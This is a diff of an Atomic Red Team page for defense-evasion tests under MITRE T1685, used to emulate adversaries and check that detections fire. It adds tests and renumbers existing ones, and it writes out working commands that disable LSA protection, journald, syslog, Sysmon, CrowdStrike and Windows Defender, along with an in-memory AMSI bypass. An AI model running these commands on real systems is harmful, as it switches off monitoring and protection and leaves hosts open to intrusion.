+> Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1685), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
 > 
 > Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
 > 
@@ -18,71 +18,154 @@
 > 
 > Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)
 
-[Source](https://attack.mitre.org/techniques/T1562/001)
+[Source](https://attack.mitre.org/techniques/T1685)
 
 ## Atomic Tests
 
-- [Atomic Test #1: Disable syslog](#atomic-test-1-disable-syslog)
-- [Atomic Test #2: Disable syslog (freebsd)](#atomic-test-2-disable-syslog-freebsd)
-- [Atomic Test #3: Disable Cb Response](#atomic-test-3-disable-cb-response)
-- [Atomic Test #4: Disable SELinux](#atomic-test-4-disable-selinux)
-- [Atomic Test #5: Stop Crowdstrike Falcon on Linux](#atomic-test-5-stop-crowdstrike-falcon-on-linux)
-- [Atomic Test #6: Disable Carbon Black Response](#atomic-test-6-disable-carbon-black-response)
-- [Atomic Test #7: Disable LittleSnitch](#atomic-test-7-disable-littlesnitch)
-- [Atomic Test #8: Disable OpenDNS Umbrella](#atomic-test-8-disable-opendns-umbrella)
-- [Atomic Test #9: Disable macOS Gatekeeper](#atomic-test-9-disable-macos-gatekeeper)
-- [Atomic Test #10: Stop and unload Crowdstrike Falcon on macOS](#atomic-test-10-stop-and-unload-crowdstrike-falcon-on-macos)
-- [Atomic Test #11: Unload Sysmon Filter Driver](#atomic-test-11-unload-sysmon-filter-driver)
-- [Atomic Test #12: Uninstall Sysmon](#atomic-test-12-uninstall-sysmon)
-- [Atomic Test #13: AMSI Bypass - AMSI InitFailed](#atomic-test-13-amsi-bypass---amsi-initfailed)
-- [Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14-amsi-bypass---remove-amsi-provider-reg-key)
-- [Atomic Test #15: Disable Arbitrary Security Windows Service](#atomic-test-15-disable-arbitrary-security-windows-service)
-- [Atomic Test #16: Tamper with Windows Defender ATP PowerShell](#atomic-test-16-tamper-with-windows-defender-atp-powershell)
-- [Atomic Test #17: Tamper with Windows Defender Command Prompt](#atomic-test-17-tamper-with-windows-defender-command-prompt)
-- [Atomic Test #18: Tamper with Windows Defender Registry](#atomic-test-18-tamper-with-windows-defender-registry)
-- [Atomic Test #19: Disable Microsoft Office Security Features](#atomic-test-19-disable-microsoft-office-security-features)
-- [Atomic Test #20: Remove Windows Defender Definition Files](#atomic-test-20-remove-windows-defender-definition-files)
-- [Atomic Test #21: Stop and Remove Arbitrary Security Windows Service](#atomic-test-21-stop-and-remove-arbitrary-security-windows-service)
-- [Atomic Test #22: Uninstall Crowdstrike Falcon on Windows](#atomic-test-22-uninstall-crowdstrike-falcon-on-windows)
-- [Atomic Test #23: Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-23-tamper-with-windows-defender-evade-scanning--folder)
-- [Atomic Test #24: Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-24-tamper-with-windows-defender-evade-scanning--extension)
-- [Atomic Test #25: Tamper with Windows Defender Evade Scanning -Process](#atomic-test-25-tamper-with-windows-defender-evade-scanning--process)
-- [Atomic Test #26: office-365-Disable-AntiPhishRule](#atomic-test-26-office-365-disable-antiphishrule)
-- [Atomic Test #27: Disable Windows Defender with DISM](#atomic-test-27-disable-windows-defender-with-dism)
-- [Atomic Test #28: Disable Defender Using NirSoft AdvancedRun](#atomic-test-28-disable-defender-using-nirsoft-advancedrun)
-- [Atomic Test #29: Kill antimalware protected processes using Backstab](#atomic-test-29-kill-antimalware-protected-processes-using-backstab)
-- [Atomic Test #30: WinPwn - Kill the event log services for stealth](#atomic-test-30-winpwn---kill-the-event-log-services-for-stealth)
-- [Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31-tamper-with-windows-defender-atp-using-aliases---powershell)
-- [Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd](#atomic-test-32-lockbit-black---disable-privacy-settings-experience-using-registry--cmd)
-- [Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd](#atomic-test-33-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd)
-- [Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34-lockbit-black---disable-privacy-settings-experience-using-registry--powershell)
-- [Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell)
-- [Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36-disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
-- [Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37-wmic-tamper-with-windows-defender-evade-scanning-folder)
-- [Atomic Test #38: Delete Windows Defender Scheduled Tasks](#atomic-test-38-delete-windows-defender-scheduled-tasks)
-- [Atomic Test #39: Clear History](#atomic-test-39-clear-history)
-- [Atomic Test #40: Suspend History](#atomic-test-40-suspend-history)
-- [Atomic Test #41: Reboot Linux Host via Kernel System Request](#atomic-test-41-reboot-linux-host-via-kernel-system-request)
-- [Atomic Test #42: Clear Pagging Cache](#atomic-test-42-clear-pagging-cache)
-- [Atomic Test #43: Disable Memory Swap](#atomic-test-43-disable-memory-swap)
-- [Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44-disable-hypervisor-enforced-code-integrity-hvci)
-- [Atomic Test #45: AMSI Bypass - Override AMSI via COM](#atomic-test-45-amsi-bypass---override-amsi-via-com)
-- [Atomic Test #46: AWS - GuardDuty Suspension or Deletion](#atomic-test-46-aws---guardduty-suspension-or-deletion)
-- [Atomic Test #47: Tamper with Defender ATP on Linux/MacOS](#atomic-test-47-tamper-with-defender-atp-on-linuxmacos)
-- [Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48-tamper-with-windows-defender-registry---regexe)
-- [Atomic Test #49: Tamper with Windows Defender Registry - Powershell](#atomic-test-49-tamper-with-windows-defender-registry---powershell)
-- [Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50-esxi---disable-account-lockout-policy-via-powercli)
-- [Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51-delete-microsoft-defender-asr-rules---intune)
-- [Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52-delete-microsoft-defender-asr-rules---gpo)
-- [Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53-amsi-bypass---create-amsienable-reg-key)
-- [Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54-disable-eventlog-application-auto-logger-session-via-registry---cmd)
-- [Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55-disable-eventlog-application-auto-logger-session-via-registry---powershell)
-- [Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56-disable-eventlog-application-etw-provider-via-registry---cmd)
-- [Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57-disable-eventlog-application-etw-provider-via-registry---powershell)
-- [Atomic Test #58: Freeze PPL-protected process with EDR-Freeze](#atomic-test-58-freeze-ppl-protected-process-with-edr-freeze)
-- [Atomic Test #59: Disable ASLR Via sysctl parameters - Linux](#atomic-test-59-disable-aslr-via-sysctl-parameters---linux)
+- [Atomic Test #1: Windows Disable LSA Protection](#atomic-test-1-windows-disable-lsa-protection)
+- [Atomic Test #2: Disable journal logging via systemctl utility](#atomic-test-2-disable-journal-logging-via-systemctl-utility)
+- [Atomic Test #3: Disable journal logging via sed utility](#atomic-test-3-disable-journal-logging-via-sed-utility)
+- [Atomic Test #4: Disable syslog](#atomic-test-1-disable-syslog)
+- [Atomic Test #5: Disable syslog (freebsd)](#atomic-test-2-disable-syslog-freebsd)
+- [Atomic Test #6: Disable Cb Response](#atomic-test-3-disable-cb-response)
+- [Atomic Test #7: Disable SELinux](#atomic-test-4-disable-selinux)
+- [Atomic Test #8: Stop Crowdstrike Falcon on Linux](#atomic-test-5-stop-crowdstrike-falcon-on-linux)
+- [Atomic Test #9: Disable Carbon Black Response](#atomic-test-6-disable-carbon-black-response)
+- [Atomic Test #10: Disable LittleSnitch](#atomic-test-7-disable-littlesnitch)
+- [Atomic Test #11: Disable OpenDNS Umbrella](#atomic-test-8-disable-opendns-umbrella)
+- [Atomic Test #12: Disable macOS Gatekeeper](#atomic-test-9-disable-macos-gatekeeper)
+- [Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS](#atomic-test-10-stop-and-unload-crowdstrike-falcon-on-macos)
+- [Atomic Test #14: Unload Sysmon Filter Driver](#atomic-test-11-unload-sysmon-filter-driver)
+- [Atomic Test #15: Uninstall Sysmon](#atomic-test-12-uninstall-sysmon)
+- [Atomic Test #16: AMSI Bypass - AMSI InitFailed](#atomic-test-13-amsi-bypass---amsi-initfailed)
+- [Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14-amsi-bypass---remove-amsi-provider-reg-key)
+- [Atomic Test #18: Disable Arbitrary Security Windows Service](#atomic-test-15-disable-arbitrary-security-windows-service)
+- [Atomic Test #19: Tamper with Windows Defender ATP PowerShell](#atomic-test-16-tamper-with-windows-defender-atp-powershell)
+- [Atomic Test #20: Tamper with Windows Defender Command Prompt](#atomic-test-17-tamper-with-windows-defender-command-prompt)
+- [Atomic Test #21: Tamper with Windows Defender Registry](#atomic-test-18-tamper-with-windows-defender-registry)
+- [Atomic Test #22: Disable Microsoft Office Security Features](#atomic-test-19-disable-microsoft-office-security-features)
+- [Atomic Test #23: Remove Windows Defender Definition Files](#atomic-test-20-remove-windows-defender-definition-files)
+- [Atomic Test #24: Stop and Remove Arbitrary Security Windows Service](#atomic-test-21-stop-and-remove-arbitrary-security-windows-service)
+- [Atomic Test #25: Uninstall Crowdstrike Falcon on Windows](#atomic-test-22-uninstall-crowdstrike-falcon-on-windows)
+- [Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-23-tamper-with-windows-defender-evade-scanning--folder)
+- [Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-24-tamper-with-windows-defender-evade-scanning--extension)
+- [Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process](#atomic-test-25-tamper-with-windows-defender-evade-scanning--process)
+- [Atomic Test #29: office-365-Disable-AntiPhishRule](#atomic-test-26-office-365-disable-antiphishrule)
+- [Atomic Test #30: Disable Windows Defender with DISM](#atomic-test-27-disable-windows-defender-with-dism)
+- [Atomic Test #31: Disable Defender Using NirSoft AdvancedRun](#atomic-test-28-disable-defender-using-nirsoft-advancedrun)
+- [Atomic Test #32: Kill antimalware protected processes using Backstab](#atomic-test-29-kill-antimalware-protected-processes-using-backstab)
+- [Atomic Test #33: WinPwn - Kill the event log services for stealth](#atomic-test-30-winpwn---kill-the-event-log-services-for-stealth)
+- [Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31-tamper-with-windows-defender-atp-using-aliases---powershell)
+- [Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd](#atomic-test-32-lockbit-black---disable-privacy-settings-experience-using-registry--cmd)
+- [Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd](#atomic-test-33-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd)
+- [Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34-lockbit-black---disable-privacy-settings-experience-using-registry--powershell)
+- [Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell)
+- [Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36-disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
+- [Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37-wmic-tamper-with-windows-defender-evade-scanning-folder)
+- [Atomic Test #41: Delete Windows Defender Scheduled Tasks](#atomic-test-38-delete-windows-defender-scheduled-tasks)
+- [Atomic Test #42: Clear History](#atomic-test-39-clear-history)
+- [Atomic Test #43: Suspend History](#atomic-test-40-suspend-history)
+- [Atomic Test #44: Reboot Linux Host via Kernel System Request](#atomic-test-41-reboot-linux-host-via-kernel-system-request)
+- [Atomic Test #45: Clear Pagging Cache](#atomic-test-42-clear-pagging-cache)
+- [Atomic Test #46: Disable Memory Swap](#atomic-test-43-disable-memory-swap)
+- [Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44-disable-hypervisor-enforced-code-integrity-hvci)
+- [Atomic Test #48: AMSI Bypass - Override AMSI via COM](#atomic-test-45-amsi-bypass---override-amsi-via-com)
+- [Atomic Test #49: AWS - GuardDuty Suspension or Deletion](#atomic-test-46-aws---guardduty-suspension-or-deletion)
+- [Atomic Test #50: Tamper with Defender ATP on Linux/MacOS](#atomic-test-47-tamper-with-defender-atp-on-linuxmacos)
+- [Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48-tamper-with-windows-defender-registry---regexe)
+- [Atomic Test #52: Tamper with Windows Defender Registry - Powershell](#atomic-test-49-tamper-with-windows-defender-registry---powershell)
+- [Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50-esxi---disable-account-lockout-policy-via-powercli)
+- [Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51-delete-microsoft-defender-asr-rules---intune)
+- [Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52-delete-microsoft-defender-asr-rules---gpo)
+- [Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53-amsi-bypass---create-amsienable-reg-key)
+- [Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54-disable-eventlog-application-auto-logger-session-via-registry---cmd)
+- [Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55-disable-eventlog-application-auto-logger-session-via-registry---powershell)
+- [Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56-disable-eventlog-application-etw-provider-via-registry---cmd)
+- [Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57-disable-eventlog-application-etw-provider-via-registry---powershell)
+- [Atomic Test #61: Freeze PPL-protected process with EDR-Freeze](#atomic-test-58-freeze-ppl-protected-process-with-edr-freeze)
+- [Atomic Test #62: Disable ASLR Via sysctl parameters - Linux](#atomic-test-59-disable-aslr-via-sysctl-parameters---linux)
+- [Atomic Test #63: Auditing Configuration Changes on Linux Host](#atomic-test-1-auditing-configuration-changes-on-linux-host)
+- [Atomic Test #64: Auditing Configuration Changes on FreeBSD Host](#atomic-test-2-auditing-configuration-changes-on-freebsd-host)
+- [Atomic Test #65: Logging Configuration Changes on Linux Host](#atomic-test-3-logging-configuration-changes-on-linux-host)
+- [Atomic Test #66: Logging Configuration Changes on FreeBSD Host](#atomic-test-4-logging-configuration-changes-on-freebsd-host)
+- [Atomic Test #67: Disable Powershell ETW Provider - Windows](#atomic-test-5-disable-powershell-etw-provider---windows)
+- [Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)](#atomic-test-6-disable-net-event-tracing-for-windows-via-registry-cmd)
+- [Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)](#atomic-test-7-disable-net-event-tracing-for-windows-via-registry-powershell)
+- [Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd](#atomic-test-8-lockbit-black---disable-the-etw-provider-of-windows-defender--cmd)
+- [Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell](#atomic-test-9-lockbit-black---disable-the-etw-provider-of-windows-defender--powershell)
+- [Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd](#atomic-test-10-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---cmd)
+- [Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell](#atomic-test-11-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---powershell)
+- [Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd](#atomic-test-12-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---cmd)
+- [Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell](#atomic-test-13-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---powershell)
+- [Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table](#atomic-test-14-block-cybersecurity-communication-by-leveraging-windows-name-resolution-policy-table)
 
-### Atomic Test #1: Disable syslog
+### Atomic Test #1: Windows Disable LSA Protection
+
+The following Atomic adds a registry entry to disable LSA Protection.
+
+The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
+Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
+https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
+https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
+https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `40075d5f-3a70-4c66-9125-f72bee87247d`
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+```cmd
+reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands
+
+```cmd
+reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
+```
+### Atomic Test #2: Disable journal logging via systemctl utility
+
+The atomic test disables the journal logging using built-in systemctl utility
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `c3a377f9-1203-4454-aa35-9d391d34768f`
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+sudo systemctl stop systemd-journald #disables journal logging
+```
+
+#### Cleanup Commands
+
+```sh
+sudo systemctl start systemd-journald #starts journal service
+sudo systemctl enable systemd-journald #starts journal service automatically at boot time
+```
+### Atomic Test #3: Disable journal logging via sed utility
+
+The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `12e5551c-8d5c-408e-b3e4-63f53b03379f`
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
+```
+
+#### Cleanup Commands
+
+```sh
+sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
+sudo systemctl restart systemd-journald #restart the journal service
+```
+
+### Atomic Test #4: Disable syslog
 
 Disables syslog collection
 
@@ -127,7 +210,7 @@ if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
 sudo #{package_installer}
 ```
 
-### Atomic Test #2: Disable syslog (freebsd)
+### Atomic Test #5: Disable syslog (freebsd)
 
 Disables syslog collection
 
@@ -148,7 +231,7 @@ sysrc syslogd_enable="NO"
 sysrc syslogd_enable="YES"
 service syslogd start
 ```
-### Atomic Test #3: Disable Cb Response
+### Atomic Test #6: Disable Cb Response
 
 Disable the Cb Response service
 
@@ -169,7 +252,7 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
 fi
 ```
 
-### Atomic Test #4: Disable SELinux
+### Atomic Test #7: Disable SELinux
 
 Disables SELinux enforcement
 
@@ -205,7 +288,7 @@ which setenforce
 echo "SELinux is not installed"; exit 1
 ```
 
-### Atomic Test #5: Stop Crowdstrike Falcon on Linux
+### Atomic Test #8: Stop Crowdstrike Falcon on Linux
 
 Stop and disable Crowdstrike Falcon on Linux
 
@@ -226,7 +309,7 @@ sudo systemctl disable falcon-sensor.service
 sudo systemctl enable falcon-sensor.service
 sudo systemctl start falcon-sensor.service
 ```
-### Atomic Test #6: Disable Carbon Black Response
+### Atomic Test #9: Disable Carbon Black Response
 
 Disables Carbon Black Response
 
@@ -247,7 +330,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plis
 sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
 sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
 ```
-### Atomic Test #7: Disable LittleSnitch
+### Atomic Test #10: Disable LittleSnitch
 
 Disables LittleSnitch
 
@@ -266,7 +349,7 @@ sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 ```sh
 sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 ```
-### Atomic Test #8: Disable OpenDNS Umbrella
+### Atomic Test #11: Disable OpenDNS Umbrella
 
 Disables OpenDNS Umbrella
 
@@ -285,7 +368,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
 ```sh
 sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
 ```
-### Atomic Test #9: Disable macOS Gatekeeper
+### Atomic Test #12: Disable macOS Gatekeeper
 
 Disables macOS Gatekeeper
 
@@ -304,7 +387,7 @@ sudo spctl --master-disable
 ```sh
 sudo spctl --master-enable
 ```
-### Atomic Test #10: Stop and unload Crowdstrike Falcon on macOS
+### Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS
 
 Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
 
@@ -332,7 +415,7 @@ sudo launchctl unload #{userdaemon_plist}
 sudo launchctl load -w #{falcond_plist}
 sudo launchctl load -w #{userdaemon_plist}
 ```
-### Atomic Test #11: Unload Sysmon Filter Driver
+### Atomic Test #14: Unload Sysmon Filter Driver
 
 Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution,
 run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
@@ -415,7 +498,7 @@ if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){
 }
 ```
 
-### Atomic Test #12: Uninstall Sysmon
+### Atomic Test #15: Uninstall Sysmon
 
 Uninstall Sysinternals Sysmon for Defense Evasion
 
@@ -427,7 +510,7 @@ Uninstall Sysinternals Sysmon for Defense Evasion
 
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder&#92;T1562.001&#92;bin&#92;sysmon.exe|
+| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder&#92;T1685&#92;bin&#92;sysmon.exe|
 
 #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
 
@@ -475,7 +558,7 @@ if(cmd /c sc query sysmon) { exit 0} else { exit 1}
 cmd /c sysmon -i -accepteula
 ```
 
-### Atomic Test #13: AMSI Bypass - AMSI InitFailed
+### Atomic Test #16: AMSI Bypass - AMSI InitFailed
 
 Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
 Upon execution, no output is displayed.
@@ -497,7 +580,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
 ```powershell
 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
 ```
-### Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key
+### Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key
 
 With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
 This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
@@ -518,7 +601,7 @@ Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-9
 ```powershell
 New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
 ```
-### Atomic Test #15: Disable Arbitrary Security Windows Service
+### Atomic Test #18: Disable Arbitrary Security Windows Service
 
 With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
 Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
@@ -547,7 +630,7 @@ sc.exe config #{service_name} start= disabled
 sc.exe config #{service_name} start= auto >nul 2>&1
 net.exe start #{service_name} >nul 2>&1
 ```
-### Atomic Test #16: Tamper with Windows Defender ATP PowerShell
+### Atomic Test #19: Tamper with Windows Defender ATP PowerShell
 
 Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
 in Windows settings.
@@ -573,7 +656,7 @@ Set-MpPreference -DisableBehaviorMonitoring 0
 Set-MpPreference -DisableScriptScanning 0
 Set-MpPreference -DisableBlockAtFirstSeen 0
 ```
-### Atomic Test #17: Tamper with Windows Defender Command Prompt
+### Atomic Test #20: Tamper with Windows Defender Command Prompt
 
 Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
 However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
@@ -597,7 +680,7 @@ sc query WinDefend
 sc start WinDefend >nul 2>&1
 sc config WinDefend start=enabled >nul 2>&1
 ```
-### Atomic Test #18: Tamper with Windows Defender Registry
+### Atomic Test #21: Tamper with Windows Defender Registry
 
 Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
 grayed out and have no info.
@@ -617,7 +700,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
 ```powershell
 Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
 ```
-### Atomic Test #19: Disable Microsoft Office Security Features
+### Atomic Test #22: Disable Microsoft Office Security Features
 
 Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
 show any warning before editing the document.
@@ -647,7 +730,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot
 Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
 Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
 ```
-### Atomic Test #20: Remove Windows Defender Definition Files
+### Atomic Test #23: Remove Windows Defender Definition Files
 
 Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
 On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
@@ -665,7 +748,7 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
 "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
 ```
 
-### Atomic Test #21: Stop and Remove Arbitrary Security Windows Service
+### Atomic Test #24: Stop and Remove Arbitrary Security Windows Service
 
 Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
 
@@ -686,7 +769,7 @@ Stop-Service -Name #{service_name}
 Remove-Service -Name #{service_name}
 ```
 
-### Atomic Test #22: Uninstall Crowdstrike Falcon on Windows
+### Atomic Test #25: Uninstall Crowdstrike Falcon on Windows
 
 Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
 
@@ -706,7 +789,7 @@ Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as a
